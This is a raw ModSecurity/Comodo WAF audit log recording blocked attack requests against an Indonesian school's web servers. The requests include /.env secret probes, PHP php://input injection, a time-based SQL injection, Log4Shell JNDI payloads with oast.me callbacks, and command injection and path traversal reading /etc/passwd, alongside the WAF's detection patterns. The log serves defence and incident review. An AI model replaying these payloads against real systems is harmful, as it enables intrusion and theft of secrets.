phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749010974135426 810 (- - -) Stopwatch2: 1749010974135426 810; combined=364, p1=320, p2=0, p3=0, p4=0, p5=44, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43362274-Z-- --6900603c-A-- [04/Jun/2025:11:28:07 +0700] aD_LVzNXNn6zAsHj7JA4SgAAAEg 103.236.140.4 46814 103.236.140.4 8181 --6900603c-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 585 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173214187 --6900603c-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!M --8035ca0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8035ca0f-E-- --8035ca0f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749020752487618 4877 (- - -) Stopwatch2: 1749020752487618 4877; combined=3296, p1=462, p2=2794, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8035ca0f-Z-- --0713e612-A-- [04/Jun/2025:14:31:46 +0700] aD_2Yl_DvM40jZomokvvLwAAAAw 103.236.140.4 48098 103.236.140.4 8181 --0713e612-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.157 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0713e612-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0713e612-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749022306716749 791 (- - -) Stopwatch2: 1749022306716749 791; combined=320, p1=276, p2=0, p3=0, p4=0, p5=44, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0713e612-Z-- --c3de7e65-A-- [04/Jun/2025:14:31:48 +0700] aD_2ZNhPZJx8OfNaLCqoXwAAAMU 103.236.140.4 48144 103.236.140.4 8181 --c3de7e65-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.157 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.157 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --c3de7e65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3de7e65-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749022308810081 771 (- - -) Stopwatch2: 1749022308810081 771; combined=351, p1=318, p2=0, p3=0, p4=0, p5=33, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3de7e65-Z-- --05c2285c-A-- [04/Jun/2025:14:48:46 +0700] aD_6XjNXNn6zAsHj7JCLwAAAAEg 103.236.140.4 42670 103.236.140.4 8181 --05c2285c-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173234458 --05c2285c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --05c2285c-E-- --05c2285c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749023326435817 2493 (- - -) Stopwatch2: 1749023326435817 2493; combined=1294, p1=297, p2=975, p3=0, p4=0, p5=22, sr=55, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --05c2285c-Z-- --4066f90f-A-- [04/Jun/2025:14:48:47 +0700] aD_6X9hPZJx8OfNaLCquawAAAMY 103.236.140.4 42692 103.236.140.4 8181 --4066f90f-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0us2vpgpeonc6qdbef06cpdm365615a9.oast.me} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0us2vpgpeonc6qdbef05kqwzs6x1rujt.oast.me} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0us2vpgpeonc6qdbef0mi7kcxn4kobqn.oast.me} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0us2vpgpeonc6qdbef03jz6r6p8u8msb.oast.me} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0us2vpgpeonc6qdbef0jbigjjw91318e.oast.me} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0us2vpgpeonc6qdbef0k4kw15e9pyjrf.oast.me} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0us2vpgpeonc6qdbef05dxzdcpjfrxaa.oast.me} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0us2vpgpeonc6qdbef0iu1qiyz5g55pm.oast.me} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0us2vpgpeonc6qdbef0hfyru877r55ej.oast.me} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0us2vpgpeonc6qdbef0ccxcfwkh5qngj.oast.me} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0us2vpgpeonc6qdbef0gnji43fetx6nr.oast.me} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0us2vpgpeonc6qdbef0ykfayd9ahz7x7.oast.me} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0us2vpgpeonc6qdbef0zfyo4i83op6hy.oast.me} X-Origin: 
${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0us2vpgpeonc6qdbef0p4abi7t1okf94.oast.me} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0us2vpgpeonc6qdbef01dez1kidbqomm.oast.me}=${jndi:ldap://${hostName}.cookievalue.d0us2vpgpeonc6qdbef0ec6ic58q3qadw.oast.me} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 172824295 --4066f90f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4066f90f-E-- --4066f90f-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749023327032336 6779 (- - -) Stopwatch2: 1749023327032336 6779; combined=4740, p1=405, p2=4294, p3=0, p4=0, p5=41, sr=62, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4066f90f-Z-- --34bb6358-A-- [04/Jun/2025:15:02:45 +0700] aD_9pTNXNn6zAsHj7JCQKAAAAE4 103.236.140.4 56716 103.236.140.4 8181 --34bb6358-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 4.188.112.137 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 4.188.112.137 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --34bb6358-C-- --34bb6358-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --34bb6358-E-- --34bb6358-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749024165560041 4479 (- - -) Stopwatch2: 1749024165560041 4479; combined=3085, p1=497, p2=2553, p3=0, p4=0, p5=34, sr=90, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --34bb6358-Z-- --de4dc069-A-- [04/Jun/2025:15:08:13 +0700] aD_-7dhPZJx8OfNaLCqz3AAAAMg 103.236.140.4 34156 103.236.140.4 8181 --de4dc069-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:5.0) Gecko/20100101 Firefox/5.0 Accept-Charset: utf-8 --de4dc069-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de4dc069-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749024493267211 683 (- - -) Stopwatch2: 1749024493267211 683; combined=285, p1=255, p2=0, p3=0, p4=0, p5=29, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de4dc069-Z-- --69cc692f-A-- [04/Jun/2025:15:40:26 +0700] aEAGejNXNn6zAsHj7JCYawAAAEI 103.236.140.4 38278 103.236.140.4 8181 --69cc692f-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 142.93.129.190 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 142.93.129.190 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --69cc692f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69cc692f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749026426642185 912 (- - -) Stopwatch2: 1749026426642185 912; combined=311, p1=264, p2=0, p3=0, p4=0, p5=47, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69cc692f-Z-- --9cd3bd58-A-- [04/Jun/2025:15:42:56 +0700] aEAHEJLmnxTwEPX7IuZKIwAAAIA 103.236.140.4 39250 103.236.140.4 8181 --9cd3bd58-B-- GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= Cache-Control: max-age=0 --9cd3bd58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9cd3bd58-E-- --9cd3bd58-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /maint/modules/home/index.php?lang=english|cat%20/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749026576174778 3013 (- - -) Stopwatch2: 1749026576174778 3013; combined=1112, p1=503, p2=562, p3=0, p4=0, p5=47, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9cd3bd58-Z-- --23a33f5a-A-- [04/Jun/2025:15:42:57 +0700] aEAHEdhPZJx8OfNaLCq8-QAAAMw 103.236.140.4 39258 103.236.140.4 8181 --23a33f5a-B-- POST /maint/index.php?packages HTTP/1.0 Referer: up.smkn22jakarta.sch.id/maint/index.php?packages Host: up.smkn22jakarta.sch.id Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 160 User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= Content-Type: application/x-www-form-urlencoded --23a33f5a-C-- xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages --23a33f5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23a33f5a-E-- --23a33f5a-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /maint/index.php?packages"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749026577532581 2106 (- - -) Stopwatch2: 1749026577532581 2106; combined=904, p1=442, p2=434, p3=0, p4=0, p5=27, sr=104, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23a33f5a-Z-- --0de9c920-A-- [04/Jun/2025:15:42:57 +0700] aEAHETNXNn6zAsHj7JCYmgAAAEk 103.236.140.4 39260 103.236.140.4 8181 --0de9c920-B-- GET /poc.jsp?cmd=cat+%2Fetc%2Fpasswd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/536.26.17 (KHTML, like Gecko) Version/6.0.2 Safari/536.26.17 Accept: */* Accept-Language: en --0de9c920-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0de9c920-E-- --0de9c920-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /poc.jsp?cmd=cat+%2Fetc%2Fpasswd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749026577568890 1735 (- - -) Stopwatch2: 1749026577568890 1735; combined=543, p1=385, p2=122, p3=0, p4=0, p5=36, sr=120, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0de9c920-Z-- --42655f1e-A-- [04/Jun/2025:15:42:57 +0700] aEAHEV_DvM40jZomoksDKwAAAA8 103.236.140.4 39262 103.236.140.4 8181 --42655f1e-B-- GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.0 Referer: up.smkn22jakarta.sch.id/maint/index.php?packages Host: up.smkn22jakarta.sch.id Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= --42655f1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42655f1e-E-- --42655f1e-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749026577600308 1784 (- - -) Stopwatch2: 1749026577600308 1784; combined=555, p1=338, p2=194, p3=0, p4=0, p5=23, sr=61, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42655f1e-Z-- --33f2201f-A-- [04/Jun/2025:15:50:21 +0700] aEAIzV_DvM40jZomoksEvgAAAAs 103.236.140.4 45594 103.236.140.4 8181 --33f2201f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.232.180.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.232.180.145 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --33f2201f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33f2201f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749027021681550 707 (- - -) Stopwatch2: 1749027021681550 707; combined=296, p1=260, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33f2201f-Z-- --ed2f7043-A-- [04/Jun/2025:15:52:01 +0700] aEAJMZLmnxTwEPX7IuZMTwAAAIo 103.236.140.4 47574 103.236.140.4 8181 --ed2f7043-B-- POST /dns-query HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 47.251.93.227 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 47.251.93.227 X-Forwarded-Proto: https Connection: close Content-Length: 29 User-Agent: Go-http-client/1.1 Content-Type: application/dns-message --ed2f7043-C-- !¸examplecom --ed2f7043-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed2f7043-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1749027121545674 4389 (- - -) Stopwatch2: 1749027121545674 4389; combined=2754, p1=649, p2=2002, p3=32, p4=38, p5=33, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
